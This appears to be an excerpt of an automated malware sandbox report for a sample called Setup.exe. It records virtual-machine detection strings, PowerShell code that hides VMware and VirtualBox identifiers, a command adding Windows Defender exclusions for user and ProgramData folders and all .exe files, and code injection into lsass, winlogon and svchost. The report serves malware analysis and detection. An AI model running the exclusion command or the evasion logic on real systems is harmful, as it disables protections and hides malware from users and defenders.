          Source: svchost.exe, 00000058.00000000.1509946822.000002AB7D812000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk2.06000c29cbcceb42671d1430c5a2a776cPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
          Source: svchost.exe, 00000068.00000000.1572890773.0000014DE202B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: "@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000070.00000000.1665419098.0000017781800000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000070.00000000.1658423819.00000177814CA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000070.00000000.1635401063.00000177809CD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Generation Counter
          Source: svchost.exe, 00000070.00000000.1649347225.0000017781213000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware Virtual disk SCSI Disk Device
          Source: svchost.exe, 00000070.00000000.1649347225.0000017781213000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00
          Source: svchost.exe, 00000070.00000000.1635401063.00000177809CD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Win32_PnPEntityMicrosoft Hyper-V Generation Counter{4d36e97d-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityMicrosoft Hyper-V Generation CounterACPI\VMW0001\7System.String[]MicrosoftMicrosoft Hyper-V Generation CounterSystemACPI\VMW0001\7gencounterOKWin32_ComputerSystemuser-PCBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74f
          Source: svchost.exe, 00000070.00000000.1631379586.000001778084D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000070.00000000.1666097721.00000177818B6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: svchost.exe, 00000058.00000000.1524317200.000002AB7F153000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D6DD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: dowvmci
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware
          Source: svchost.exe, 00000070.00000002.2809444149.00000177815B6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware VMCI Bus Device
          Source: svchost.exe, 00000070.00000000.1666097721.00000177818B6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Win32_PnPEntityPCI\ZA2OC8U6&DEV_0740&SUBSYS_074015AD&REV_10\3&61AAA01&0&3FVMware VMCI Bus DeviceWin32_ComputerSystemuser-PCVMware, Inc.PCI\L5GLB1OV&DEV_0740&SUBSYS_074015AD&REV_10\3&61AAA01&0&3FVMware VMCI Bus DeviceSystem.String[]System.String[]vmci{4d36e97d-e325-11ce-bfc1-08002be10318}VMware VMCI Bus DeviceWin32_PnPEntityOKSystemWin32_PnPEntity
          Source: svchost.exe, 00000058.00000000.1501606126.000002AB7CC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000058.00000002.2553811851.000002AB7CC31000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisoron
          Source: svchost.exe, 00000058.00000000.1519460664.000002AB7DE12000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
          Source: svchost.exe, 00000070.00000000.1666097721.00000177818B6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Win32_PnPEntityROOT\VID\0000Microsoft Hyper-V Virtualization Infrastructure DriverWin32_ComputerSystemuser-PCMicrosoftROOT\VID\0000Microsoft Hyper-V Virtualization Infrastructure DriverSystem.String[]Vid{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Virtualization Infrastructure DriverWin32_PnPEntityOKSystemWin32_PnPEntity
          Source: svchost.exe, 0000000A.00000002.2516685763.0000025C04A2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: dialer.exe, 00000051.00000002.2736429489.00000237CEEF8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`j
          Source: svchost.exe, 0000000A.00000002.2528081013.0000025C04A4C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}st
          Source: svchost.exe, 00000058.00000000.1524317200.000002AB7F153000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
          Source: svchost.exe, 00000068.00000000.1573751858.0000014DE2102000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000068.00000002.2515892556.0000014DE2036000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
          Source: svchost.exe, 00000068.00000000.1572890773.0000014DE202B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: LSI_SASVMware Virtual disk 6000c29cbcceb42671d1430c5a2a776c
          Source: svchost.exe, 00000070.00000000.1661196455.0000017781590000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DiskVMware__Virtual_disk____2.0_SCSI\DiskVMware__Virtual_disk____SCSI\DiskVMware__SCSI\VMware__Virtual_disk____2VMware__Virtual_disk____2GenDisk
          Source: svchost.exe, 00000068.00000000.1573105114.0000014DE2040000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: "@SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: svchost.exe, 00000070.00000000.1661196455.0000017781590000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware__Virtual_disk____2
          Source: lsass.exe, 00000031.00000000.1407822225.000001BA8DA89000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicvssNT SERVICE
          Source: svchost.exe, 0000000A.00000002.2528081013.0000025C04A4C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: olume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D: @
          Source: svchost.exe, 00000070.00000003.1915578900.00000177818B3000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.
          Source: svchost.exe, 0000000A.00000002.2555931604.0000025C04A81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000070.00000000.1631379586.000001778084D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Win32_PnPEntityNECVMWar VMware SATA CD00{4d36e965-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityCD-ROM DriveSCSI\CDROM&VEN_NECVMWAR&PROD_S39LE_9U_SATA_CD00\4&224F42EF&0&000000System.String[](Standard CD-ROM drives)NECVMWar VMware SATA CD00CDROMSCSI\CDROM&VEN_NECVMWAR&PROD_DWR7T7SL_SATA_CD00\4&224F42EF&0&000000cdromOKWin32_ComputerSystemuser-PCBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74
          Source: svchost.exe, 00000068.00000000.1572890773.0000014DE202B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000068.00000000.1573105114.0000014DE2040000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: svchost.exe, 00000070.00000000.1679265456.00000177FFEB1000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware(@
          Source: svchost.exe, 00000070.00000002.2809444149.00000177815B6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: PCI\VEN_15AD&DEV_0740&REV_10PCI\VEN_15AD&DEV_0740PCI\VEN_15AD&CC_088000PCI\VEN_15AD&CC_0880PCI\VEN_15ADPCI\CC_088000PCI\CC_0880VMware, Inc.{4d36e97d-e325-11ce-bfc1-08002be10318}SystemvmciPCI\VEN_15AD&DEV_0740&SUBSYS_074015AD&REV_10\3&61AAA01&0&3FWin32_ComputerSystemWin32_PnPEntityuser-PCVMware VMCI Bus DeviceOKVMware VMCI Bus DeviceVMware VMCI Bus Device
          Source: svchost.exe, 00000058.00000000.1509946822.000002AB7D800000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
          Source: OfficeClickToRun.exe, 00000074.00000000.1769933033.000001570EDC5000.00000004.00000001.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000074.00000000.1732873071.000001570D70C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: JavaVirtualMachine
          Source: svchost.exe, 00000058.00000000.1509946822.000002AB7D812000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
          Source: svchost.exe, 0000000A.00000002.2555931604.0000025C04A65000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: storahciNECVMWarVMware SATA CD00
          Source: svchost.exe, 00000070.00000000.1633069505.00000177808D7000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Win32_PnPEntityVMware Virtual disk SCSI Disk Device{4d36e967-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityDisk driveSCSI\DISK&VEN_U3GCMCE2&PROD_VIRTUAL_DISK\4&1656F219&0&000000System.String[](Standard disk drives)VMware Virtual disk SCSI Disk DeviceDiskDriveSCSI\DISK&VEN_LZ4ZTPLC&PROD_VIRTUAL_DISK\4&1656F219&0&000000diskOKWin32_ComputerSystemuser-PCBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74
          Source: lsass.exe, 00000031.00000000.1407209712.000001BA8DA13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000038.00000000.1413891488.0000012E36413000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000053.00000000.1477366927.000001B3B942B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000054.00000000.1479752162.0000023368624000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000056.00000000.1485614982.0000029BC7A52000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000058.00000000.1501914715.000002AB7CC43000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000005D.00000000.1537778471.000001C25522B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000005E.00000000.1540169933.00000171ACC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000061.00000000.1548378383.000001D50022B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000063.00000000.1557193891.000001EAC5C53000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000065.00000000.1565116913.0000015221659000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: svchost.exe, 00000070.00000000.1661196455.0000017781590000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DiskVMware__Virtual_disk____
          Source: lsass.exe, 00000031.00000000.1407822225.000001BA8DA89000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicshutdownNT SERVICE
          Source: svchost.exe, 00000058.00000000.1509946822.000002AB7D800000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: RVMwareVirtual disk6000c29cbcceb42671d1430c5a2a776c8
          Source: svchost.exe, 00000068.00000000.1573512373.0000014DE206A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: UDFBBSCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: svchost.exe, 00000068.00000002.2538587150.0000014DE2046000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000HD
          Source: svchost.exe, 00000068.00000000.1572890773.0000014DE202B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
          Source: svchost.exe, 00000070.00000000.1661196455.0000017781590000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DiskVMware__Virtual_disk____2.0_
          Source: svchost.exe, 00000058.00000000.1524317200.000002AB7F153000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value)
          Source: svchost.exe, 00000038.00000003.1564486065.0000012E3646E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: svchost.exe, 00000068.00000000.1572890773.0000014DE202B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: "@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000071.00000000.1684040204.000001647AE02000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
          Source: lsass.exe, 00000031.00000000.1407822225.000001BA8DA89000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicheartbeatNT SERVICE
          Source: dialer.exe, 00000051.00000002.2736429489.00000237CEF51000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW=h
          Source: svchost.exe, 00000070.00000000.1665419098.0000017781800000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ACPI\VM_Gen_CounterVM_Gen_Counter*PNP0C02Microsoft{4d36e97d-e325-11ce-bfc1-08002be10318}SystemgencounterACPI\VMW0001\7Win32_ComputerSystemWin32_PnPEntityuser-PCMicrosoft Hyper-V Generation CounterOKMicrosoft Hyper-V Generation CounterMicrosoft Hyper-V Generation Counter
          Source: svchost.exe, 0000006D.00000000.1614000316.0000028F03640000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWws\System32\en-US\wshqos.dll.mui
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: nonicVMware Virtual disk 6000c29cbcceb42671d1430c5a2a776cce
          Source: svchost.exe, 00000058.00000000.1509946822.000002AB7D800000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: RVMwareVirtual disk6000c29cbcceb42671d1430c5a2a776c0
          Source: svchost.exe, 00000070.00000000.1649347225.0000017781213000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Win32_PnPEntitySCSI\CDROM&VEN_NECVMWAR&PROD_DWR7T7SL_SATA_CD00\4&224F42EF&0&000000NECVMWar VMware SATA CD00Win32_ComputerSystemuser-PC(Standard CD-ROM drives)SCSI\CDROM&VEN_NECVMWAR&PROD_S39LE_9U_SATA_CD00\4&224F42EF&0&000000NECVMWar VMware SATA CD00System.String[]System.String[]cdrom{4d36e965-e325-11ce-bfc1-08002be10318}CD-ROM DriveWin32_PnPEntityOKCDROMWin32_PnPEntity
          Source: svchost.exe, 00000058.00000000.1524317200.000002AB7F153000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
          Source: svchost.exe, 00000070.00000000.1661196455.0000017781590000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: svchost.exe, 00000070.00000000.1658423819.00000177814CA000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Win32_PnPEntityACPI\VMW0001\7Microsoft Hyper-V Generation CounterWin32_ComputerSystemuser-PCMicrosoftACPI\VMW0001\7Microsoft Hyper-V Generation CounterSystem.String[]System.String[]gencounter{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterWin32_PnPEntityOKSystemWin32_PnPEntity
          Source: svchost.exe, 00000070.00000000.1661196455.0000017781590000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\VMware__Virtual_disk____2
          Source: svchost.exe, 00000070.00000000.1679265456.00000177FFEB1000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NoneVMware(@
          Source: C:\Windows\System32\dialer.exe | API call chain: ExitProcess graph end node graph_41-413
          Source: C:\Windows\System32\dialer.exe | API call chain: ExitProcess graph end node graph_81-91
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
          Source: C:\Windows\System32\dasHost.exe | Code function: 131_2_0000028092387D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 131_2_0000028092387D90
          Source: C:\Windows\System32\dialer.exe | Code function: 81_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 81_2_00000001408460F0
          Source: C:\Windows\System32\dialer.exe | Code function: 41_2_00000001400017EC GetProcessHeap,RtlAllocateHeap,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree, 41_2_00000001400017EC
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Windows\System32\dialer.exe | Process token adjusted: Debug
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Windows\System32\dialer.exe | Process token adjusted: Debug
          Source: C:\Windows\System32\dialer.exe | Code function: 80_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 80_2_0000000140001160
          Source: C:\Windows\System32\dasHost.exe | Code function: 131_2_0000028092387D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 131_2_0000028092387D90
          Source: C:\Windows\System32\dasHost.exe | Code function: 131_2_000002809238D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 131_2_000002809238D2A4

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: 1C8F78F0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\lsass.exe base: 1BA8E920000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 12E36FA0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 28F8AE40000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: 1C8F7960000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\lsass.exe base: 1BA8E980000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 12E37000000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 28F8AE70000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 22C35FA0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1B3B9390000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 23368CB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 28B68F30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 29BC8180000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 29D50F40000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2AB7D2C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1E9297D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1A183790000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1D564190000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1CF6D790000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1C2551B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 171ACBC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 283C6530000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1FF39B80000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1D500190000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 257B5780000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1EAC63D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 20428C60000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 15222280000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 16D24BB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 163535B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 14DE2730000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1B3122B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\spoolsv.exe base: 7A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 184E1BC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 211FEB70000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 28F03C70000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1F3D2900000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1F22EB90000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 17780D60000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1647B460000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 224D0D90000 protect: page execute and read and write
